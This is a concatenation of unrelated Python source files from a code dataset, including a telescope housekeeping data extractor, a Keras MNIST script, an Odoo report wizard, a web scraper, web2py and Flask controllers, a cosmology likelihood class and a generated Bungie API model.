f['array']['cryo']['temperature'][0][1]\n t.he4_head = f['array']['cryo']['temperature'][0][2]\n t.he4_fb = f['array']['cryo']['temperature'][0][3]\n t.he4_pump = 
f['array']['cryo']['temperature'][0][4]\n t.ic_pump = f['array']['cryo']['temperature'][0][5]\n t.uc_pump = f['array']['cryo']['temperature'][0][6]\n t.he4_sw = f['array']['cryo']['temperature'][0][7]\n t.ic_sw = f['array']['cryo']['temperature'][0][8]\n t.uc_sw = f['array']['cryo']['temperature'][0][9]\n t.uc_stage = f['array']['cryo']['temperature'][0][10]\n t.lc_tower = f['array']['cryo']['temperature'][0][11]\n t.ic_stage = f['array']['cryo']['temperature'][0][12]\n t.t4k_head = f['array']['cryo']['temperature'][0][13]\n t.t4k_squid_strap = f['array']['cryo']['temperature'][0][14]\n t.t50k_head = f['array']['cryo']['temperature'][0][15]\n\n # Optics\n t.b1_50k_wbp_near = f['array']['cryo']['temperature'][1][0]\n t.b2_50k_wbp_far = f['array']['cryo']['temperature'][1][1]\n t.b3_50k_diving_board = f['array']['cryo']['temperature'][1][2]\n t.b4_50k_top_bot_ptc = f['array']['cryo']['temperature'][1][3]\n t.y1_50k_head = f['array']['cryo']['temperature'][1][4]\n t.y2_50k_window_strap_near = f['array']['cryo']['temperature'][1][5]\n t.y3_50k_tube_strap_near = f['array']['cryo']['temperature'][1][6]\n t.y4_50k_tube = f['array']['cryo']['temperature'][1][7]\n t.g1_4k_head = f['array']['cryo']['temperature'][1][8]\n t.g2_4k_strap = f['array']['cryo']['temperature'][1][9]\n t.g3_4k_lens_tab = f['array']['cryo']['temperature'][1][10]\n t.g4_4k_lens_tab_far = f['array']['cryo']['temperature'][1][11]\n t.r1_4k_top_top_ptc = f['array']['cryo']['temperature'][1][12]\n t.r2_50k_midop_bot_ptc = f['array']['cryo']['temperature'][1][13]\n t.r3_4k_lyot_flange = f['array']['cryo']['temperature'][1][14]\n t.r4_4k_lyot = f['array']['cryo']['temperature'][1][15]\n\n # Receiver\n t.t4k_plate_far = f['array']['cryo']['temperature'][2][0]\n t.t4k_strap_optics = f['array']['cryo']['temperature'][2][1]\n t.t4k_plate_mid = f['array']['cryo']['temperature'][2][2]\n t.t4k_plate_top = f['array']['cryo']['temperature'][2][3]\n t.t4k_plate_ptc = f['array']['cryo']['temperature'][2][4]\n t.t50k_harness_middle = f['array']['cryo']['temperature'][2][6]\n t.t50k_strap = f['array']['cryo']['temperature'][2][7]\n t.squid_wh1_sl1 = f['array']['cryo']['temperature'][2][8]\n t.squid_wh5_sl1 = f['array']['cryo']['temperature'][2][9]\n t.squid_wh3_sl7 = f['array']['cryo']['temperature'][2][10]\n t.cal_filament = f['array']['cryo']['temperature'][2][11]\n t.cal_ambient1 = f['array']['cryo']['temperature'][2][12]\n t.cal_ambient2 = f['array']['cryo']['temperature'][2][13]\n t.cal_ambient3 = f['array']['cryo']['temperature'][2][14]\n\n # Heaters\n t.heat_he4_pump = f['array']['cryo']['heater_dac'][0][3]\n t.heat_ic_pump = f['array']['cryo']['heater_dac'][0][4]\n t.heat_uc_pump = f['array']['cryo']['heater_dac'][0][5]\n t.heat_he4_sw = f['array']['cryo']['heater_dac'][0][0]\n t.heat_ic_sw = f['array']['cryo']['heater_dac'][0][1]\n t.heat_uc_sw= f['array']['cryo']['heater_dac'][0][2]\n\n f['CryoStatus'] = t\n\n\n@core.indexmod\ndef UnpackPTData(f):\n '''Extracts pulse tube status information to PTStatus key \n in frame'''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n if 'pt415' not in f['array']:\n return\n\n p = core.G3MapDouble()\n\n p.time = f['array']['pt415']['utc']\n p.optics_lowp = f['array']['pt415']['pressure_low'][0]\n p.min_optics_lowp = f['array']['pt415']['min_pressure_low'][0]\n p.max_optics_lowp = f['array']['pt415']['max_pressure_low'][0]\n p.optics_highp = f['array']['pt415']['pressure_high'][0]\n p.min_optics_highp = f['array']['pt415']['min_pressure_high'][0]\n p.max_optics_highp = 
f['array']['pt415']['max_pressure_high'][0]\n p.optics_tempoil = f['array']['pt415']['temp_oil'][0]\n p.min_optics_tempoil = f['array']['pt415']['min_temp_oil'][0]\n p.max_optics_tempoil = f['array']['pt415']['max_temp_oil'][0]\n\n p.receiver_lowp = f['array']['pt415']['pressure_low'][1]\n p.min_receiver_lowp = f['array']['pt415']['min_pressure_low'][1]\n p.max_receiver_lowp = f['array']['pt415']['max_pressure_low'][1]\n p.receiver_highp = f['array']['pt415']['pressure_high'][1]\n p.min_receiver_highp = f['array']['pt415']['min_pressure_high'][1]\n p.max_receiver_highp = f['array']['pt415']['max_pressure_high'][1]\n p.receiver_tempoil = f['array']['pt415']['temp_oil'][1]\n p.min_receiver_tempoil = f['array']['pt415']['min_temp_oil'][1]\n p.max_receiver_tempoil = f['array']['pt415']['max_temp_oil'][1]\n\n p.optics_is_valid = f['array']['pt415']['deviceIsValid'][0]\n p.receiver_is_valid = f['array']['pt415']['deviceIsValid'][1]\n\n\n f['PTStatus'] = p\n\n@core.indexmod\ndef UnpackMuxData(f):\n '''\n Add the DFMux data to the frame.\n '''\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n try:\n mux = f['array']['muxHousekeeping']\n boards = mux['boardname']\n except KeyError:\n return\n\n fpga_temp = core.G3MapDouble()\n board_name = core.G3MapString()\n\n for i, bn in enumerate(boards):\n bn = str(bn).replace('\"', '') # get rid of extra quotes in board name\n if bn != \"\":\n board_name[str(i)] = bn\n fpga_temp[str(i)] = mux['MB_TEMPERATURE_FPGA_DIE'][i]\n fpga_temp.time = mux['utc']\n board_name.time = mux['utc']\n f['MuxFPGATemp'] = fpga_temp\n f['MuxBoardName'] = board_name\n\n@core.indexmod\ndef UnpackWeatherData(f):\n '''Extracts weather status information to Weather key \n in frame'''\n\n if f.type != core.G3FrameType.GcpSlow:\n return\n\n if 'weather' not in f['array']:\n return\n\n t = core.G3MapDouble()\n t.time = f['array']['weather']['utc']\n t.telescope_temp = f['array']['weather']['airTemperature'].value\n t.telescope_pressure = f['array']['weather']['pressure'].value\n t.inside_dsl_temp = f['array']['weather']['internalTemperature'].value\n t.wind_speed = f['array']['weather']['windSpeed'].value\n t.wind_direction = f['array']['weather']['windDirection'].value\n t.battery = f['array']['weather']['battery'].value\n t.rel_humidity = f['array']['weather']['relativeHumidity'].value\n t.power = f['array']['weather']['power'].value\n t.tau = f['array']['tipper']['tau'].value\n t.tatm = f['array']['tipper']['tatm'].value\n\n f['Weather'] = t\n\n@core.pipesegment\ndef ARCExtract(pipe):\n '''Extract GCP registers into native objects'''\n pipe.Add(CalibrateFrame)\n pipe.Add(UnpackACUData)\n pipe.Add(UnpackTrackerPointingData)\n pipe.Add(DecryptFeatureBit)\n pipe.Add(UnpackTrackerData)\n pipe.Add(AddBenchData)\n pipe.Add(UnpackCryoData)\n pipe.Add(UnpackPTData)\n pipe.Add(UnpackMuxData)\n pipe.Add(UnpackWeatherData)\n\n@core.pipesegment\ndef ARCExtractMinimal(pipe):\n '''\n Extract bare minimum GCP registers into native objects.\n\n Includes only GCPFeatureBits, SourceName and ObservationID keys.\n Use ARCExtract to calibrate and extract the complete frame.\n '''\n pipe.Add(DecryptFeatureBit)\n pipe.Add(UnpackTrackerMinimal)\n\n# Need tool for tilt meter next\n","sub_path":"gcp/python/ARCExtractor.py","file_name":"ARCExtractor.py","file_ext":"py","file_size_in_byte":27148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"627667994","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nimport keras\nimport 
keras.backend as K\nfrom keras import models\nfrom keras import layers\nfrom keras.models import load_model\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\n\nimport tensorflow as tf\n\nfrom ista import ISTA\n\n###\n#$$ nonconvex loss function\n###\ndef not_convex(y_true, y_pred):\n return K.sum(K.square(y_true - y_pred)) / ( K.sum(K.square(y_true)) + K.sum(K.square(y_pred)) )\n\n###\n### start a session - will need same session to link K to tf\n###\n\nsession = tf.Session()\nK.set_session(session)\n\n###\n### generate dummy model\n###\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\ntrain = x_train.reshape((60000,28*28)).astype('float32') / 255\ntest = x_test.reshape((10000,28*28)).astype('float32') / 255\n\ntrain_labels = to_categorical(y_train)\ntest_labels = to_categorical(y_test)\n\nmu = 0.0001\nconstraints = [keras.regularizers.l1(mu), ISTA(mu)]\nlocations = ['l1', 'ista']\n\nfor con, loc in zip(constraints, locations):\n\n net = models.Sequential()\n net.add(layers.Dense(256, activation='relu', input_shape=(28*28,)))\n net.add(layers.Dense(128, activation='relu'))\n if loc == 'l1':\n net.add(layers.Dense(128, activation='relu', kernel_regularizer=con))\n elif loc == 'ista':\n net.add(layers.Dense(128, activation='relu', kernel_constraint=con))\n else:\n net.add(layers.Dense(128, activation='relu'))\n net.add(layers.Dense(10, activation='softmax'))\n net.compile(optimizer='adam',loss=not_convex,metrics=['accuracy'])\n # net.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n\n h = net.fit(train,\n train_labels,\n epochs=40,\n batch_size=128,\n shuffle=True)\n\n net.save('mnistmodel-'+loc+'.h5')\n","sub_path":"analysis/mnist/buildmnistmodels.py","file_name":"buildmnistmodels.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"589132886","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo import exceptions\n\n\nclass IacAsnCustomsSasSearchLine(models.Model):\n _inherit = 'iac.customs.sas.line'\n _name = 'iac.asn.customs.sas.search.line'\n _table = 'iac_customs_sas_line'\n\n # sas_stock_line_ids = fields.One2many('iac.customs.sas.line.inherit', 'sas_stock_id', string=u'出入库单line ID', index=True)\n\n\nclass IacAsnCustomsSasSearchData(models.Model):\n _inherit = 'iac.customs.sas.header'\n _name = 'iac.asn.customs.sas.search.data'\n _table = 'iac_customs_sas_header'\n\n sas_stock_line_ids = fields.One2many('iac.asn.customs.sas.search.line', 'sas_stock_id', string=u'出入库单line ID', index=True)\n\n\nclass IacAsnCustomsSasReport(models.TransientModel):\n\n _name = 'iac.asn.customs.sas.report.wizard'\n # _auto = False\n\n plant_id = fields.Many2one('pur.org.data',string='Plant *')\n vendor_code = fields.Many2one('iac.vendor',string='Vendor Code')\n sas_dcl_no = fields.Char(string=u'业务申报表编号')\n # part_no = fields.Char(string=u'料号')\n sas_stock_no = fields.Char(string=u'出入库单编号')\n sas_stock_preent_no = fields.Char(string=u'预录入编号')\n stock_typecd = fields.Selection([(\"I\", u\"进区\"), (\"E\", u\"出区\")], string=u\"出入库单类型\")\n state = fields.Selection([(\"wait_mm_approve\", u\"待采购确认\"),\n (\"wait_lg_approve\", u\"待关务确认\"),\n (\"mm_reject\", u\"采购拒绝\"),\n ('lg_approved', u'关务核准'),\n (\"lg_reject\", u\"关务拒绝\"),\n (\"interface_submit_success\", u\"推送海关系统成功\"),\n (\"interface_submit_fail\", u\"推送海关系统失败\"),\n ('cancel', u'厂商取消'),\n (\"to_cancel\", u\"作废中\"),\n 
(\"done\", \"done\")], string=u\"状态\")\n from_date = fields.Date(string='From Date *')\n to_date = fields.Date(string='To Date *')\n\n @api.multi\n def search_customs_sas_data(self):\n self.ensure_one()\n # result = []\n domain = []\n for wizard in self:\n if wizard.plant_id:\n domain += [('plant_id', '=', wizard.plant_id.id)]\n if wizard.vendor_code:\n domain += [('vendor_id', '=', wizard.vendor_code.id)]\n if wizard.sas_dcl_no:\n domain += [('sas_dcl_no', '=', wizard.sas_dcl_no)]\n if wizard.sas_stock_no:\n domain += [('sas_stock_no', '=', wizard.sas_stock_no)]\n if wizard.sas_stock_preent_no:\n domain += [('sas_stock_preent_no', '=', wizard.sas_stock_preent_no)]\n if wizard.stock_typecd:\n domain += [('stock_typecd', '=', wizard.stock_typecd)]\n if wizard.state:\n domain += [('state', '=', wizard.state)]\n if wizard.from_date and not wizard.to_date:\n domain += [('create_date', '>=', wizard.from_date)]\n if wizard.to_date and not wizard.from_date:\n domain += [('create_date', '<=', wizard.to_date)]\n\n if wizard.from_date and wizard.to_date:\n if wizard.from_date > wizard.to_date:\n raise exceptions.ValidationError(u'查询日期条件不正确!')\n else:\n domain += [('create_date', '>=', wizard.from_date), ('create_date', '<=', wizard.to_date)]\n\n for item in self.env.user.groups_id:\n if item.name == 'External vendor' and not wizard.vendor_code:\n raise exceptions.ValidationError(u'厂商必须选择vendor code')\n\n result = self.env['iac.asn.customs.sas.search.data'].search(domain)\n if not result:\n raise exceptions.ValidationError(u'查无资料!')\n\n action = {\n 'domain': [('id', 'in', [x.id for x in result])],\n 'name': 'customs sas',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'tree,form',\n 'res_model': 'iac.asn.customs.sas.search.data'\n\n }\n return action\n","sub_path":"addons/mk_addons/myaddons/iac_report/models/iac_asn_customs_sas_report.py","file_name":"iac_asn_customs_sas_report.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"219701737","text":"from datetime import datetime\nfrom bs4 import BeautifulSoup\nimport locale, requests\n\ndef GelredomeLoader():\n try: #Rick\n locale.setlocale(locale.LC_ALL,'nl_NL.UTF-8')#Dutch\n except: #Sander\n locale.setlocale(locale.LC_ALL,'Dutch_Netherlands.1252')#Dutch\n\n URL = 'http://www.gelredome.nl/nl/evenementen'\n container = []\n \n # #Scrape the main site for links to events\n for link in BeautifulSoup(requests.get(URL).content,\"html.parser\").findAll('div',attrs={'class':'agenda-items__content '}): \n title = link.find('h3').text\n if 'Vitesse' not in title:\n url = 'http://www.gelredome.nl' + link.find('a')['href']\n \n day = link.find('div',attrs={'class':'agenda-items__day'}).text.strip()\n month = link.find('div',attrs={'class':'agenda-items__month'}).text.strip()\n date = datetime.strptime(day + ' ' + month,'%d %B %Y').date()\n time = None\n\n container.append([title,\n date,\n time,\n url])\n \n try: #Rick\n locale.setlocale(locale.LC_ALL,'en_US.UTF-8')#English US\n except: #Sander\n locale.setlocale(locale.LC_ALL,'English_United States.1252')#English US\n return container","sub_path":"Venues/Gelredome.py","file_name":"Gelredome.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"298829666","text":"# -*- coding: utf-8 -*-\n# this file is released under public domain and you can use without 
limitations\n\n#########################################################################\n## This is a sample controller\n## - index is the default action of any application\n## - user is required for authentication and authorization\n## - download is for downloading files uploaded in the db (does streaming)\n## - call exposes all registered services (none by default)\n#########################################################################\nimport saasu_api_helpers\nfrom gluon.tools import geocode\nfrom simplejson import loads,dumps\nfrom datetime import date, datetime,timedelta\n\ndef index():\n \"\"\"\n example action using the internationalization operator T and flash\n rendered by views/default/index.html or views/generic.html\n\n if you need a simple wiki simply replace the two lines below with:\n return auth.wiki()\n \"\"\"\n response.flash = T(\"Welcome to web2py!\")\n return dict(message=T('Hello World'))\n\n\ndef user():\n \"\"\"\n exposes:\n http://..../[app]/default/user/login\n http://..../[app]/default/user/logout\n http://..../[app]/default/user/register\n http://..../[app]/default/user/profile\n http://..../[app]/default/user/retrieve_password\n http://..../[app]/default/user/change_password\n http://..../[app]/default/user/manage_users (requires membership in\n use @auth.requires_login()\n @auth.requires_membership('group name')\n @auth.requires_permission('read','table name',record_id)\n to decorate functions that need access control\n \"\"\"\n return dict(form=auth())\n\n@cache.action()\ndef download():\n \"\"\"\n allows downloading of uploaded files\n http://..../[app]/default/download/[filename]\n \"\"\"\n return response.download(request, db)\n\n\ndef call():\n \"\"\"\n exposes services. for example:\n http://..../[app]/default/call/jsonrpc\n decorate with @services.jsonrpc the functions to expose\n supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv\n \"\"\"\n return service()\n\n\n@auth.requires_signature()\ndef data():\n \"\"\"\n http://..../[app]/default/data/tables\n http://..../[app]/default/data/create/[table]\n http://..../[app]/default/data/read/[table]/[id]\n http://..../[app]/default/data/update/[table]/[id]\n http://..../[app]/default/data/delete/[table]/[id]\n http://..../[app]/default/data/select/[table]\n http://..../[app]/default/data/search/[table]\n but URLs must be signed, i.e. 
linked with\n A('table',_href=URL('data/tables',user_signature=True))\n or with the signed load operator\n LOAD('default','data.load',args='tables',ajax=True,user_signature=True)\n \"\"\"\n return dict(form=crud())\n\n@auth.requires_login() #should actually be admin user\ndef edit_file_config():\n \"\"\" edit the saasu file config\n \"\"\"\n grid=SQLFORM.grid(db.saasu_file_data)\n return {'grid':grid}\n\n# @auth.requires_login()\n# def choose_saasu_file():\n# \"\"\" find all saasu files the user can see\n# \"\"\"\n# file_qry = (db.auth_membership.user_id == auth.user_id ) & (db.saasu_file_data.saasu_group == db.auth_membership.group_id)\n# file_set = db(file_qry)\n# rows = file_set.select(db.saasu_file_data.id,db.saasu_file_data.saasu_filename,db.saasu_file_data.saasu_fileUID)\n# if rows:\n# if not session.saasu_fileUID:\n# session.saasu_fileUID = rows[0].saasu_fileUID\n# form = SQLFORM.factory(Field('choose_file',\n# default=session.saasu_fileUID,\n# requires=IS_IN_DB(file_set,'saasu_file_data.saasu_fileUID','%(saasu_filename)s')))\n# form.vars.choose_file=session.saasy_fileUID\n#\n# if form.process(keepvalues=True).accepted:\n# response.flash = 'Saasu file is now: %s' % form.vars.choose_file\n# session.saasu_fileUID = form.vars.choose_file\n# redirect( request.env.http_web2py_component_location,client_side=True)\n# elif form.errors:\n# response.flash = 'form has errors'\n#\n# return {'form':form}\n\n\n@auth.requires_login()\ndef choose_saasu_file_v2():\n \"\"\" find all saasu files the user can see\n \"\"\"\n file_qry = (db.auth_membership.user_id == auth.user_id ) & (db.saasu_file_data.saasu_group == db.auth_membership.group_id)\n file_set = db(file_qry)\n rows = file_set.select(db.saasu_file_data.id,db.saasu_file_data.saasu_filename,db.saasu_file_data.saasu_fileUID)\n if rows:\n if not session.saasu_fileUID:\n session.saasu_fileUID = rows[0].saasu_fileUID\n form = SQLFORM.factory(Field('choose_file',\n\n default=session.saasu_fileUID,\n requires=IS_IN_DB(file_set,'saasu_file_data.saasu_fileUID','%(saasu_filename)s')))\n\n form.vars.choose_file = session.saasu_fileUID\n if form.process(keepvalues=True).accepted:\n saasu_file_name = db(db.saasu_file_data.saasu_fileUID==form.vars.choose_file).select(db.saasu_file_data.saasu_filename).first().saasu_filename\n response.flash = 'Saasu file is now: %s' % saasu_file_name\n session.saasu_fileUID = form.vars.choose_file\n if request.vars.target_div:\n response.js = \"jQuery('#%s').get(0).reload()\" % request.vars.target_div\n #response.js = \"jQuery('#google_map_comp').reload()\"\n elif form.errors:\n response.flash = 'form has errors'\n return {'form':form}\n\n@auth.requires_login()\ndef google_map():\n locations = []\n rows = db((db.saasu_contact.is_customer == True) & (db.saasu_contact.is_active == True) & (db.saasu_contact.saasu_fileUID == session.saasu_fileUID)).select()\n for customer in rows:\n locations.append((getattr(customer,\"latitude\",0),getattr(customer,\"longitude\",0),customer.company))\n\n locations_json = dumps(locations)\n return locals()\n\n\n\n@auth.requires_login()\ndef contacts_grid():\n def update_contact_table(ws_access_key=None,file_uid=None,last_sync_date = None): #this is controlled via cache\n contacts = saasu_api_helpers.get_contacts(ws_access_key=ws_access_key,file_uid=file_uid,last_sync_date=last_sync_date)\n i = 0\n for contact in contacts:\n\n if not contact['country']:\n contact['country'] = 'Australia'\n (latitude,longitude) = geocode(\"%(street)s %(city)s %(state)s %(country)s \" %\n { 'street': 
contact['street'] or '',\n 'city':contact['city'] or '',\n 'state':contact['state'] or '',\n 'country':contact['country'] or ''}\n )\n db.saasu_contact.update_or_insert(\n ((db.saasu_contact.saasu_fileUID == file_uid ) &\n (db.saasu_contact.saasu_contactUID == contact['contactUid'])),\n saasu_fileUID = file_uid,\n saasu_contactUID = contact['contactUid'],\n family_name = contact['familyName'],\n given_name = contact['givenName'],\n company = contact['organisationName'],\n email = contact['emailAddress'],\n main_phone = contact['mainPhone'],\n mobile_phone =contact['mobilePhone'] ,\n mailing_street = contact['street'] ,\n mailing_town = contact['city'],\n mailing_zip = contact['postCode'],\n mailing_state = contact['state'],\n is_active = contact['isActive'],\n is_customer = contact['isCustomer'],\n is_supplier = contact['isSupplier'],\n mailing_country = contact['country'],\n latitude = latitude,\n longitude = longitude\n )\n #update the last sync date. It's supposed to be a UTC time stamp so I'll just take 2 days off the current date\n\n # db(db.saasu_file_data.saasu_fileUID == session.saasu_fileUID).update(\n # last_contact_sync=((datetime.now() - timedelta(days=2)).date()))\n two_days_ago = (datetime.now() - timedelta(days=1))\n db(db.saasu_file_data.saasu_fileUID == session.saasu_fileUID).update(\n last_contact_sync=two_days_ago)\n\n grid = None\n if session.saasu_fileUID:\n saasu_file_record = db(db.saasu_file_data.saasu_fileUID == session.saasu_fileUID).select().first()\n last_sync_date = saasu_file_record.last_contact_sync\n if saasu_file_record:\n saasu_api_key = saasu_file_record.saasu_api_key\n contact_list = cache.disk('contacts-%s' % saasu_api_key,\n lambda: update_contact_table(ws_access_key=saasu_file_record.saasu_api_key,\n file_uid=saasu_file_record.saasu_fileUID,\n last_sync_date=last_sync_date),\n time_expire=500)\n grid = SQLFORM.grid(db.saasu_contact.saasu_fileUID == session.saasu_fileUID,\n fields=[db.saasu_contact.company,db.saasu_contact.given_name,db.saasu_contact.family_name,db.saasu_contact.mailing_town,db.saasu_contact.mailing_zip,db.saasu_contact.mailing_state],\n deletable=False,editable=False,create=False,paginate=100,maxtextlength=40,\n )\n\n return {'grid':grid}\n\n@auth.requires_login()\ndef map_contacts():\n locations = []\n rows = db((db.saasu_contact.is_customer == True) & (db.saasu_contact.is_active == True) & (db.saasu_contact.saasu_fileUID == session.saasu_fileUID)).select()\n for customer in rows:\n locations.append((getattr(customer,\"latitude\",0),getattr(customer,\"longitude\",0),customer.company))\n\n locations_json = dumps(locations)\n\n\n return locals()\n\n\n@auth.requires_login()\ndef map_contacts_v2():\n return locals()\n\n\n@auth.requires_login()\ndef browse_contacts():\n return locals()","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":10075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"585520879","text":"from flaskweb import db\nimport datetime\n\n# Method to calculate the mean rating,\n# accept a list of services and return a list\ndef meanRating(services):\n for j in services:\n length = len(j['Rating'])\n if length == 0:\n j['meanRating'] = 0\n else:\n sum1 = sum(j['Rating'])\n meanRating = sum1 / length\n meanRating = round(meanRating, 1)\n j['meanRating'] = meanRating\n services = sorted(services, key=lambda k: -(k.get('meanRating')))\n return services\n\n# Method to get the services from the db based on types\n# Accept the 
service type, return a list of services\ndef getServices(name):\n cursor = db.Services.find({'Type':name})\n services = []\n for i in cursor:\n # Use the services that contain description and coordinate\n if i['Type'] != 'hotlines':\n if i['What'] != 'Unknown' and i['Latitude'] != 'Unknown' and i['Longitude'] != 'Unknown':\n services.append(i)\n else:\n if i['What'] != 'Unknown':\n services.append(i)\n services = meanRating(services)\n return services\n\n# Method to set the pagination\n# Accept a list of data\ndef getServicesPage(data, offset=0, per_page=10):\n return data[offset: offset + per_page]\n\n# Method to return a specific service with detailed information\n# Accept the type and the id_\ndef getInfo(name, id_):\n data = getServices(name)\n for i in data:\n if str(i.get('id_')) == id_:\n return i\n\n# Method to update the rating, each user can only give one rating to one service\n# Accept the service type and id_, the rating(str) and user email\ndef updateRating(name, id_, rating, email):\n alist = db.Services.find_one({'Type': name, 'id_': int(id_)}).get('Rating')\n ratingDic = db.user.find_one({'email': email}).get('rating')\n key = name + id_\n\n # check whether the user has given a rating the this service,\n # If no, add the new rating. Else replace the previous rating\n if key not in ratingDic.keys():\n ratingDic[key] = int(rating)\n alist.append(int(rating))\n else:\n oldrating = int(ratingDic[key])\n ratingDic[key] = int(rating)\n alist.remove(oldrating)\n alist.append(int(rating))\n\n # Update both user and services db\n db.Services.update_one(\n {'Type': name, 'id_': int(id_)},\n {'$set': {\n 'Rating': alist\n }}\n )\n db.user.update_one(\n {'email': email},\n {'$set': {\n 'rating': ratingDic\n }}\n )\n return 'success'\n\n# Method to add the user's favorite\n# Accept user's email, the favorited service's type and id_\n# Users' favorite store the type and the id_\ndef updateFavorite(email, service_name, service_id):\n alist = db.user.find_one({'email': email}).get('favorite')\n service = {'Type': service_name, 'id_': service_id}\n if service not in alist:\n alist.insert(0, service)\n db.user.update_one(\n {'email': email},\n {'$set': {\n 'favorite': alist\n }}\n )\n return 'success'\n else:\n return 'fail'\n\n# Method to remove the user's favorite\n# Accept user's email, the favorited service's type and id_\ndef remFavorite(email, service_name, service_id):\n alist = db.user.find_one({'email': email}).get('favorite')\n service = {'Type': service_name, 'id_': service_id}\n if service in alist:\n alist.remove(service)\n db.user.update_one(\n {'email': email},\n {'$set': {\n 'favorite': alist\n }}\n )\n return 'success'\n else:\n return 'fail'\n\n# Method to get the detailed favorited service\n# Accept user's email and return a list of services\ndef getFavorite(email):\n alist = db.user.find_one({'email': email}).get('favorite')\n favoData = []\n for i in alist:\n favoData.append(getInfo(i['Type'], i['id_']))\n return favoData\n\n# Method to return the today's day\ndef pass_today():\n dic = {'0':'Monday', '1':'Tuesday', '2':'Wednesday', '3':'Thursday',\n '4':'Friday', '5':'Saturday', '6':'Sunday'}\n day = datetime.datetime.today().weekday()\n return dic[str(day)]\n\n# Method to determine if there is a map in search display page\n# Accept a list of services, return yes or no\ndef ifMap(data):\n map = 'yes'\n if len(data) == 1 and data[0]['Type'] == 'hotlines':\n map = 'no'\n else:\n typeList = []\n for i in data:\n typeList.append(i['Type'])\n if len(set(typeList)) == 1 and 
typeList[0] == 'hotlines':\n map = 'no'\n else:\n for i in data:\n if i['Type'] != 'hotlines':\n temp = i\n data.remove(i)\n data.insert(0,temp)\n break\n return map\n","sub_path":"IEweb_Backup/flaskweb/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"212620964","text":"import numpy as np\nimport pandas as pd\nimport scipy.linalg\n\nfrom ..core import LogLike\n\n\nclass TdistLogLike(LogLike):\n \"\"\"A T-distribution for the log-likelihood.\n\n This distribution is appropriate when the covariance has been obtained\n from a finite number of simulations. See Sellentin & Heavens\n (2016; arXiv:1511.05969). As the number of simulations increases, the\n T-distribution approaches a Gaussian.\n\n Parameters\n ----------\n data : str\n The path to the covariance matrix in CSV format. The columns should be\n {'i', 'j', 'cov'} giving the indices of each matrix element and its\n value.\n data_vector : list of str\n A list of the statistics in the config file in the order they appear in\n the covariance matrix.\n nu: int\n The shape parameter. Set to the number of simulations.\n\n Attributes\n ----------\n cov : np.ndarray, shape (n, n)\n The covariance matrix.\n cholesky : np.ndarray, shape (n, n)\n The (lower triangular) Cholesky decomposition of the covariance matrix.\n\n Methods\n -------\n compute_loglike : compute the log-likelihood\n \"\"\"\n def __init__(self, data, data_vector, nu):\n self.data = data\n self.data_vector = data_vector\n self.nu = nu\n\n df = pd.read_csv(data)\n dim = max(np.max(df['i']), np.max(df['j'])) + 1\n cov = np.zeros((dim, dim))\n cov[df['i'].values, df['j'].values] = df['cov'].values\n self.cov = cov\n self.cholesky = scipy.linalg.cholesky(cov, lower=True)\n\n def compute(self, data, theory, **kwargs):\n \"\"\"Compute the log-likelihood.\n\n Parameters\n ----------\n data : dict of arrays\n A dictionary mapping the names of the statistics to their\n values in the data.\n theory : dict of arrays\n A dictionary mapping the names of the statistics to their\n predictions.\n **kwargs : extra keyword arguments\n Any extra keyword arguments are ignored.\n\n Returns\n -------\n loglike : float\n The log-likelihood.\n \"\"\"\n dv = []\n for stat in self.data_vector:\n dv.append(np.atleast_1d(data[stat] - np.atleast_1d(theory[stat])))\n dv = np.concatenate(dv, axis=0)\n x = scipy.linalg.solve_triangular(self.cholesky, dv, lower=True)\n chi2 = np.dot(x, x)\n return -0.5 * self.nu * np.log(1.0 + chi2 / (self.nu - 1.0))\n","sub_path":"firecrown/ccl/likelihoods/tdist.py","file_name":"tdist.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"8224553","text":"# coding: utf-8\n\n\"\"\"\n Bungie.Net API\n\n These endpoints constitute the functionality exposed by Bungie.net, both for more traditional website functionality and for connectivity to Bungie video games and their related functionality. 
# noqa: E501\n\n OpenAPI spec version: 2.1.1\n Contact: support@bungie.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.models.destiny_definitions_items_destiny_derived_item_category_definition import DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition # noqa: F401,E501\n\n\nclass DestinyDefinitionsDestinyItemPreviewBlockDefinition(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'preview_vendor_hash': 'int',\n 'preview_action_string': 'str',\n 'derived_item_categories': 'list[DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition]'\n }\n\n attribute_map = {\n 'preview_vendor_hash': 'previewVendorHash',\n 'preview_action_string': 'previewActionString',\n 'derived_item_categories': 'derivedItemCategories'\n }\n\n def __init__(self, preview_vendor_hash=None, preview_action_string=None, derived_item_categories=None): # noqa: E501\n \"\"\"DestinyDefinitionsDestinyItemPreviewBlockDefinition - a model 